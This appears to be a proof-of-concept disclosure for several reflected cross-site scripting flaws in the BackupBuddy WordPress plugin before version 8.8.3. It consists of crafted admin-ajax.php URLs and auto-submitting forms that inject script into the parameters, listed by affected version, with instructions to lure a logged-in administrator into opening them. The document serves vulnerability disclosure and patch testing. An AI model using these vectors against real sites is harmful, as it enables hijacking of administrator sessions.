BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting

Make a logged in admin/SA open one of the URL below:

v < 8.8.3

<form action="https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=migrate_status" method="POST">
    <input type="text" name="step" value="<svg/onload=alert(/XSS/)>">
    <input type="submit" name="submit" value="submit">
</form>

<form action="https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=remote_send" method="POST">
    <input type="text" name="file" value="<svg/onload=alert(/XSS/)>">
    <input type="submit" name="submit" value="submit">
</form>

https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&archive=--!><svg/onload=alert(/XSS/)>-
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&file=--!><svg/onload=alert(/XSS/)>-

v < 8.8.2

https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=view_log&serial="><svg/onload=alert(/XSS/)>

v < 8.8.1
https://example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)>

http:/example.com/wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&sending=%3C/script%3E%3Csvg/onload=alert(/XSS/)%3E